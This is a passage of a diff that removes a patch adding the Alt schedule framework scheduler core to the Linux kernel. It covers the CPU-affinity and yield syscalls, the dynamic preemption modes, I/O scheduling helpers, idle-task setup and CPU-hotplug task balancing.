-+	p = find_process_by_pid(pid);
-+	if (!p) {
-+		rcu_read_unlock();
-+		return -ESRCH;
-+	}
-+
-+	/* Prevent p going away */
-+	get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (p->flags & PF_NO_SETAFFINITY) {
-+		retval = -EINVAL;
-+		goto out_put_task;
-+	}
-+
-+	if (!check_same_owner(p)) {
-+		rcu_read_lock();
-+		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
-+			rcu_read_unlock();
-+			retval = -EPERM;
-+			goto out_put_task;
-+		}
-+		rcu_read_unlock();
-+	}
-+
-+	retval = security_task_setscheduler(p);
-+	if (retval)
-+		goto out_put_task;
-+
-+	retval = __sched_setaffinity(p, in_mask);
-+out_put_task:
-+	put_task_struct(p);
-+	return retval;
-+}
-+
-+static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
-+			     struct cpumask *new_mask)
-+{
-+	if (len < cpumask_size())
-+		cpumask_clear(new_mask);
-+	else if (len > cpumask_size())
-+		len = cpumask_size();
-+
-+	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
-+}
-+
-+/**
-+ * sys_sched_setaffinity - set the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to the new CPU mask
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	cpumask_var_t new_mask;
-+	int retval;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
-+	if (retval == 0)
-+		retval = sched_setaffinity(pid, new_mask);
-+	free_cpumask_var(new_mask);
-+	return retval;
-+}
-+
-+long sched_getaffinity(pid_t pid, cpumask_t *mask)
-+{
-+	struct task_struct *p;
-+	raw_spinlock_t *lock;
-+	unsigned long flags;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	task_access_lock_irqsave(p, &lock, &flags);
-+	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getaffinity - get the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to hold the current CPU mask
-+ *
-+ * Return: size of CPU mask copied to user_mask_ptr on success. An
-+ * error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	int ret;
-+	cpumask_var_t mask;
-+
-+	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
-+		return -EINVAL;
-+	if (len & (sizeof(unsigned long)-1))
-+		return -EINVAL;
-+
-+	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	ret = sched_getaffinity(pid, mask);
-+	if (ret == 0) {
-+		unsigned int retlen = min_t(size_t, len, cpumask_size());
-+
-+		if (copy_to_user(user_mask_ptr, mask, retlen))
-+			ret = -EFAULT;
-+		else
-+			ret = retlen;
-+	}
-+	free_cpumask_var(mask);
-+
-+	return ret;
-+}
-+
-+static void do_sched_yield(void)
-+{
-+	struct rq *rq;
-+	struct rq_flags rf;
-+
-+	if (!sched_yield_type)
-+		return;
-+
-+	rq = this_rq_lock_irq(&rf);
-+
-+	schedstat_inc(rq->yld_count);
-+
-+	if (1 == sched_yield_type) {
-+		if (!rt_task(current))
-+			do_sched_yield_type_1(current, rq);
-+	} else if (2 == sched_yield_type) {
-+		if (rq->nr_running > 1)
-+			rq->skip = current;
-+	}
-+
-+	preempt_disable();
-+	raw_spin_unlock_irq(&rq->lock);
-+	sched_preempt_enable_no_resched();
-+
-+	schedule();
-+}
-+
-+/**
-+ * sys_sched_yield - yield the current processor to other threads.
-+ *
-+ * This function yields the current CPU to other tasks. If there are no
-+ * other threads running on this CPU then this function will return.
-+ *
-+ * Return: 0.
-+ */
-+SYSCALL_DEFINE0(sched_yield)
-+{
-+	do_sched_yield();
-+	return 0;
-+}
-+
-+#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
-+int __sched __cond_resched(void)
-+{
-+	if (should_resched(0)) {
-+		preempt_schedule_common();
-+		return 1;
-+	}
-+	/*
-+	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
-+	 * whether the current CPU is in an RCU read-side critical section,
-+	 * so the tick can report quiescent states even for CPUs looping
-+	 * in kernel context.  In contrast, in non-preemptible kernels,
-+	 * RCU readers leave no in-memory hints, which means that CPU-bound
-+	 * processes executing in kernel context might never report an
-+	 * RCU quiescent state.  Therefore, the following code causes
-+	 * cond_resched() to report a quiescent state, but only when RCU
-+	 * is in urgent need of one.
-+	 */
-+#ifndef CONFIG_PREEMPT_RCU
-+	rcu_all_qs();
-+#endif
-+	return 0;
-+}
-+EXPORT_SYMBOL(__cond_resched);
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define cond_resched_dynamic_enabled	__cond_resched
-+#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(cond_resched);
-+
-+#define might_resched_dynamic_enabled	__cond_resched
-+#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(might_resched);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
-+int __sched dynamic_cond_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_cond_resched);
-+
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
-+int __sched dynamic_might_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_might_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_might_resched);
-+#endif
-+#endif
-+
-+/*
-+ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
-+ * call schedule, and on return reacquire the lock.
-+ *
-+ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
-+ * operations here to prevent schedule() from being called twice (once via
-+ * spin_unlock(), once by hand).
-+ */
-+int __cond_resched_lock(spinlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held(lock);
-+
-+	if (spin_needbreak(lock) || resched) {
-+		spin_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		spin_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_lock);
-+
-+int __cond_resched_rwlock_read(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_read(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		read_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		read_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_read);
-+
-+int __cond_resched_rwlock_write(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_write(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		write_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		write_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_write);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+
-+#ifdef CONFIG_GENERIC_ENTRY
-+#include <linux/entry-common.h>
-+#endif
-+
-+/*
-+ * SC:cond_resched
-+ * SC:might_resched
-+ * SC:preempt_schedule
-+ * SC:preempt_schedule_notrace
-+ * SC:irqentry_exit_cond_resched
-+ *
-+ *
-+ * NONE:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * VOLUNTARY:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- __cond_resched
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * FULL:
-+ *   cond_resched               <- RET0
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- preempt_schedule
-+ *   preempt_schedule_notrace   <- preempt_schedule_notrace
-+ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
-+ */
-+
-+enum {
-+	preempt_dynamic_undefined = -1,
-+	preempt_dynamic_none,
-+	preempt_dynamic_voluntary,
-+	preempt_dynamic_full,
-+};
-+
-+int preempt_dynamic_mode = preempt_dynamic_undefined;
-+
-+int sched_dynamic_mode(const char *str)
-+{
-+	if (!strcmp(str, "none"))
-+		return preempt_dynamic_none;
-+
-+	if (!strcmp(str, "voluntary"))
-+		return preempt_dynamic_voluntary;
-+
-+	if (!strcmp(str, "full"))
-+		return preempt_dynamic_full;
-+
-+	return -EINVAL;
-+}
-+
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
-+#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
-+#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
-+#else
-+#error "Unsupported PREEMPT_DYNAMIC mechanism"
-+#endif
-+
-+void sched_dynamic_update(int mode)
-+{
-+	/*
-+	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
-+	 * the ZERO state, which is invalid.
-+	 */
-+	preempt_dynamic_enable(cond_resched);
-+	preempt_dynamic_enable(might_resched);
-+	preempt_dynamic_enable(preempt_schedule);
-+	preempt_dynamic_enable(preempt_schedule_notrace);
-+	preempt_dynamic_enable(irqentry_exit_cond_resched);
-+
-+	switch (mode) {
-+	case preempt_dynamic_none:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: none\n");
-+		break;
-+
-+	case preempt_dynamic_voluntary:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_enable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: voluntary\n");
-+		break;
-+
-+	case preempt_dynamic_full:
-+		preempt_dynamic_disable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_enable(preempt_schedule);
-+		preempt_dynamic_enable(preempt_schedule_notrace);
-+		preempt_dynamic_enable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: full\n");
-+		break;
-+	}
-+
-+	preempt_dynamic_mode = mode;
-+}
-+
-+static int __init setup_preempt_mode(char *str)
-+{
-+	int mode = sched_dynamic_mode(str);
-+	if (mode < 0) {
-+		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
-+		return 0;
-+	}
-+
-+	sched_dynamic_update(mode);
-+	return 1;
-+}
-+__setup("preempt=", setup_preempt_mode);
-+
-+static void __init preempt_dynamic_init(void)
-+{
-+	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
-+		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
-+			sched_dynamic_update(preempt_dynamic_none);
-+		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
-+			sched_dynamic_update(preempt_dynamic_voluntary);
-+		} else {
-+			/* Default static call setting, nothing to do */
-+			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
-+			preempt_dynamic_mode = preempt_dynamic_full;
-+			pr_info("Dynamic Preempt: full\n");
-+		}
-+	}
-+}
-+
-+#define PREEMPT_MODEL_ACCESSOR(mode) \
-+	bool preempt_model_##mode(void)						 \
-+	{									 \
-+		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
-+		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
-+	}									 \
-+	EXPORT_SYMBOL_GPL(preempt_model_##mode)
-+
-+PREEMPT_MODEL_ACCESSOR(none);
-+PREEMPT_MODEL_ACCESSOR(voluntary);
-+PREEMPT_MODEL_ACCESSOR(full);
-+
-+#else /* !CONFIG_PREEMPT_DYNAMIC */
-+
-+static inline void preempt_dynamic_init(void) { }
-+
-+#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
-+
-+/**
-+ * yield - yield the current processor to other threads.
-+ *
-+ * Do not ever use this function, there's a 99% chance you're doing it wrong.
-+ *
-+ * The scheduler is at all times free to pick the calling task as the most
-+ * eligible task to run, if removing the yield() call from your code breaks
-+ * it, it's already broken.
-+ *
-+ * Typical broken usage is:
-+ *
-+ * while (!event)
-+ * 	yield();
-+ *
-+ * where one assumes that yield() will let 'the other' process run that will
-+ * make event true. If the current task is a SCHED_FIFO task that will never
-+ * happen. Never use yield() as a progress guarantee!!
-+ *
-+ * If you want to use yield() to wait for something, use wait_event().
-+ * If you want to use yield() to be 'nice' for others, use cond_resched().
-+ * If you still want to use yield(), do not!
-+ */
-+void __sched yield(void)
-+{
-+	set_current_state(TASK_RUNNING);
-+	do_sched_yield();
-+}
-+EXPORT_SYMBOL(yield);
-+
-+/**
-+ * yield_to - yield the current processor to another thread in
-+ * your thread group, or accelerate that thread toward the
-+ * processor it's on.
-+ * @p: target task
-+ * @preempt: whether task preemption is allowed or not
-+ *
-+ * It's the caller's job to ensure that the target task struct
-+ * can't go away on us before we can do any checks.
-+ *
-+ * In Alt schedule FW, yield_to is not supported.
-+ *
-+ * Return:
-+ *	true (>0) if we indeed boosted the target task.
-+ *	false (0) if we failed to boost the target.
-+ *	-ESRCH if there's no task to yield to.
-+ */
-+int __sched yield_to(struct task_struct *p, bool preempt)
-+{
-+	return 0;
-+}
-+EXPORT_SYMBOL_GPL(yield_to);
-+
-+int io_schedule_prepare(void)
-+{
-+	int old_iowait = current->in_iowait;
-+
-+	current->in_iowait = 1;
-+	blk_flush_plug(current->plug, true);
-+	return old_iowait;
-+}
-+
-+void io_schedule_finish(int token)
-+{
-+	current->in_iowait = token;
-+}
-+
-+/*
-+ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
-+ * that process accounting knows that this is a task in IO wait state.
-+ *
-+ * But don't do that if it is a deliberate, throttling IO wait (this task
-+ * has set its backing_dev_info: the queue against which it should throttle)
-+ */
-+
-+long __sched io_schedule_timeout(long timeout)
-+{
-+	int token;
-+	long ret;
-+
-+	token = io_schedule_prepare();
-+	ret = schedule_timeout(timeout);
-+	io_schedule_finish(token);
-+
-+	return ret;
-+}
-+EXPORT_SYMBOL(io_schedule_timeout);
-+
-+void __sched io_schedule(void)
-+{
-+	int token;
-+
-+	token = io_schedule_prepare();
-+	schedule();
-+	io_schedule_finish(token);
-+}
-+EXPORT_SYMBOL(io_schedule);
-+
-+/**
-+ * sys_sched_get_priority_max - return maximum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the maximum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = MAX_RT_PRIO - 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+/**
-+ * sys_sched_get_priority_min - return minimum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the minimum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	alt_sched_debug();
-+
-+	if (pid < 0)
-+		return -EINVAL;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+	rcu_read_unlock();
-+
-+	*t = ns_to_timespec64(sched_timeslice_ns);
-+	return 0;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_rr_get_interval - return the default timeslice of a process.
-+ * @pid: pid of the process.
-+ * @interval: userspace pointer to the timeslice value.
-+ *
-+ *
-+ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
-+ * an error code.
-+ */
-+SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
-+		struct __kernel_timespec __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_timespec64(&t, interval);
-+
-+	return retval;
-+}
-+
-+#ifdef CONFIG_COMPAT_32BIT_TIME
-+SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
-+		struct old_timespec32 __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_old_timespec32(&t, interval);
-+	return retval;
-+}
-+#endif
-+
-+void sched_show_task(struct task_struct *p)
-+{
-+	unsigned long free = 0;
-+	int ppid;
-+
-+	if (!try_get_task_stack(p))
-+		return;
-+
-+	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
-+
-+	if (task_is_running(p))
-+		pr_cont("  running task    ");
-+#ifdef CONFIG_DEBUG_STACK_USAGE
-+	free = stack_not_used(p);
-+#endif
-+	ppid = 0;
-+	rcu_read_lock();
-+	if (pid_alive(p))
-+		ppid = task_pid_nr(rcu_dereference(p->real_parent));
-+	rcu_read_unlock();
-+	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
-+		free, task_pid_nr(p), ppid,
-+		read_task_thread_flags(p));
-+
-+	print_worker_info(KERN_INFO, p);
-+	print_stop_info(KERN_INFO, p);
-+	show_stack(p, NULL, KERN_INFO);
-+	put_task_stack(p);
-+}
-+EXPORT_SYMBOL_GPL(sched_show_task);
-+
-+static inline bool
-+state_filter_match(unsigned long state_filter, struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/* no filter, everything matches */
-+	if (!state_filter)
-+		return true;
-+
-+	/* filter, but doesn't match */
-+	if (!(state & state_filter))
-+		return false;
-+
-+	/*
-+	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
-+	 * TASK_KILLABLE).
-+	 */
-+	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
-+		return false;
-+
-+	return true;
-+}
-+
-+
-+void show_state_filter(unsigned int state_filter)
-+{
-+	struct task_struct *g, *p;
-+
-+	rcu_read_lock();
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * reset the NMI-timeout, listing all files on a slow
-+		 * console might take a lot of time:
-+		 * Also, reset softlockup watchdogs on all CPUs, because
-+		 * another CPU might be blocked waiting for us to process
-+		 * an IPI.
-+		 */
-+		touch_nmi_watchdog();
-+		touch_all_softlockup_watchdogs();
-+		if (state_filter_match(state_filter, p))
-+			sched_show_task(p);
-+	}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	/* TODO: Alt schedule FW should support this
-+	if (!state_filter)
-+		sysrq_sched_debug_show();
-+	*/
-+#endif
-+	rcu_read_unlock();
-+	/*
-+	 * Only show locks if all tasks are dumped:
-+	 */
-+	if (!state_filter)
-+		debug_show_all_locks();
-+}
-+
-+void dump_cpu_task(int cpu)
-+{
-+	if (cpu == smp_processor_id() && in_hardirq()) {
-+		struct pt_regs *regs;
-+
-+		regs = get_irq_regs();
-+		if (regs) {
-+			show_regs(regs);
-+			return;
-+		}
-+	}
-+
-+	if (trigger_single_cpu_backtrace(cpu))
-+		return;
-+
-+	pr_info("Task dump for CPU %d:\n", cpu);
-+	sched_show_task(cpu_curr(cpu));
-+}
-+
-+/**
-+ * init_idle - set up an idle thread for a given CPU
-+ * @idle: task in question
-+ * @cpu: CPU the idle task belongs to
-+ *
-+ * NOTE: this function does not set the idle thread's NEED_RESCHED
-+ * flag, to make booting more robust.
-+ */
-+void __init init_idle(struct task_struct *idle, int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	__sched_fork(0, idle);
-+
-+	raw_spin_lock_irqsave(&idle->pi_lock, flags);
-+	raw_spin_lock(&rq->lock);
-+
-+	idle->last_ran = rq->clock_task;
-+	idle->__state = TASK_RUNNING;
-+	/*
-+	 * PF_KTHREAD should already be set at this point; regardless, make it
-+	 * look like a proper per-CPU kthread.
-+	 */
-+	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
-+	kthread_set_per_cpu(idle, cpu);
-+
-+	sched_queue_init_idle(&rq->queue, idle);
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * It's possible that init_idle() gets called multiple times on a task,
-+	 * in that case do_set_cpus_allowed() will not do the right thing.
-+	 *
-+	 * And since this is boot we can forgo the serialisation.
-+	 */
-+	set_cpus_allowed_common(idle, cpumask_of(cpu));
-+#endif
-+
-+	/* Silence PROVE_RCU */
-+	rcu_read_lock();
-+	__set_task_cpu(idle, cpu);
-+	rcu_read_unlock();
-+
-+	rq->idle = idle;
-+	rcu_assign_pointer(rq->curr, idle);
-+	idle->on_cpu = 1;
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
-+
-+	/* Set the preempt count _outside_ the spinlocks! */
-+	init_idle_preempt_count(idle, cpu);
-+
-+	ftrace_graph_init_idle_task(idle, cpu);
-+	vtime_init_idle(idle, cpu);
-+#ifdef CONFIG_SMP
-+	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
-+			      const struct cpumask __maybe_unused *trial)
-+{
-+	return 1;
-+}
-+
-+int task_can_attach(struct task_struct *p,
-+		    const struct cpumask *cs_effective_cpus)
-+{
-+	int ret = 0;
-+
-+	/*
-+	 * Kthreads which disallow setaffinity shouldn't be moved
-+	 * to a new cpuset; we don't want to change their CPU
-+	 * affinity and isolating such threads by their set of
-+	 * allowed nodes is unnecessary.  Thus, cpusets are not
-+	 * applicable for such threads.  This prevents checking for
-+	 * success of set_cpus_allowed_ptr() on all attached tasks
-+	 * before cpus_mask may be changed.
-+	 */
-+	if (p->flags & PF_NO_SETAFFINITY)
-+		ret = -EINVAL;
-+
-+	return ret;
-+}
-+
-+bool sched_smp_initialized __read_mostly;
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+/*
-+ * Ensures that the idle task is using init_mm right before its CPU goes
-+ * offline.
-+ */
-+void idle_task_exit(void)
-+{
-+	struct mm_struct *mm = current->active_mm;
-+
-+	BUG_ON(current != this_rq()->idle);
-+
-+	if (mm != &init_mm) {
-+		switch_mm(mm, &init_mm, current);
-+		finish_arch_post_lock_switch();
-+	}
-+
-+	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
-+}
-+
-+static int __balance_push_cpu_stop(void *arg)
-+{
-+	struct task_struct *p = arg;
-+	struct rq *rq = this_rq();
-+	struct rq_flags rf;
-+	int cpu;
-+
-+	raw_spin_lock_irq(&p->pi_lock);
-+	rq_lock(rq, &rf);
-+
-+	update_rq_clock(rq);
-+
-+	if (task_rq(p) == rq && task_on_rq_queued(p)) {
-+		cpu = select_fallback_rq(rq->cpu, p);
-+		rq = __migrate_task(rq, p, cpu);
-+	}
-+
-+	rq_unlock(rq, &rf);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	put_task_struct(p);
-+
-+	return 0;
-+}
-+
-+static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
-+
-+/*
-+ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
-+ * effective when the hotplug motion is down.
-+ */
-+static void balance_push(struct rq *rq)
-+{
-+	struct task_struct *push_task = rq->curr;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*
-+	 * Ensure the thing is persistent until balance_push_set(.on = false);
-+	 */
-+	rq->balance_callback = &balance_push_callback;
-+
-+	/*
-+	 * Only active while going offline and when invoked on the outgoing
-+	 * CPU.
-+	 */
-+	if (!cpu_dying(rq->cpu) || rq != this_rq())
-+		return;
-+
-+	/*
-+	 * Both the cpu-hotplug and stop task are in this case and are
-+	 * required to complete the hotplug process.
-+	 */
-+	if (kthread_is_per_cpu(push_task) ||
-+	    is_migration_disabled(push_task)) {
-+
-+		/*
-+		 * If this is the idle task on the outgoing CPU try to wake
-+		 * up the hotplug control thread which might wait for the
-+		 * last task to vanish. The rcuwait_active() check is
-+		 * accurate here because the waiter is pinned on this CPU
-+		 * and can't obviously be running in parallel.
-+		 *
-+		 * On RT kernels this also has to check whether there are
-+		 * pinned and scheduled out tasks on the runqueue. They
-+		 * need to leave the migrate disabled section first.
-+		 */
-+		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
-+		    rcuwait_active(&rq->hotplug_wait)) {
-+			raw_spin_unlock(&rq->lock);
-+			rcuwait_wake_up(&rq->hotplug_wait);
-+			raw_spin_lock(&rq->lock);
-+		}
-+		return;
-+	}
-+
-+	get_task_struct(push_task);
-+	/*
-+	 * Temporarily drop rq->lock such that we can wake-up the stop task.
-+	 * Both preemption and IRQs are still disabled.
-+	 */
-+	raw_spin_unlock(&rq->lock);
-+	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
-+			    this_cpu_ptr(&push_work));
-+	/*
-+	 * At this point need_resched() is true and we'll take the loop in
-+	 * schedule(). The next pick is obviously going to be the stop task
-+	 * which kthread_is_per_cpu() and will push this task away.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	struct rq_flags rf;
-+
-+	rq_lock_irqsave(rq, &rf);
-+	if (on) {
-+		WARN_ON_ONCE(rq->balance_callback);
-+		rq->balance_callback = &balance_push_callback;
-+	} else if (rq->balance_callback == &balance_push_callback) {
-+		rq->balance_callback = NULL;
-+	}
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+/*
-+ * Invoked from a CPUs hotplug control thread after the CPU has been marked
-+ * inactive. All tasks which are not per CPU kernel threads are either
-+ * pushed off this CPU now via balance_push() or placed on a different CPU
-+ * during wakeup. Wait until the CPU is quiescent.
-+ */
-+static void balance_hotplug_wait(void)
-+{
-+	struct rq *rq = this_rq();
-+
-+	rcuwait_wait_event(&rq->hotplug_wait,
-+			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
-+			   TASK_UNINTERRUPTIBLE);
-+}
-+
-+#else
-+
-+static void balance_push(struct rq *rq)
-+{
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+}
-+
-+static inline void balance_hotplug_wait(void)
-+{
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+static void set_rq_offline(struct rq *rq)
-+{
-+	if (rq->online)
-+		rq->online = false;
-+}
-+
-+static void set_rq_online(struct rq *rq)
-+{
-+	if (!rq->online)
-+		rq->online = true;
-+}
-+
-+/*
-+ * used to mark begin/end of suspend/resume:
-+ */
-+static int num_cpus_frozen;
-+
-+/*
-+ * Update cpusets according to cpu_active mask.  If cpusets are
-+ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
-+ * around partition_sched_domains().
-+ *
-+ * If we come here as part of a suspend/resume, don't touch cpusets because we
-+ * want to restore it back to its original state upon resume anyway.
-+ */
-+static void cpuset_cpu_active(void)
-+{
-+	if (cpuhp_tasks_frozen) {
-+		/*
-+		 * num_cpus_frozen tracks how many CPUs are involved in suspend
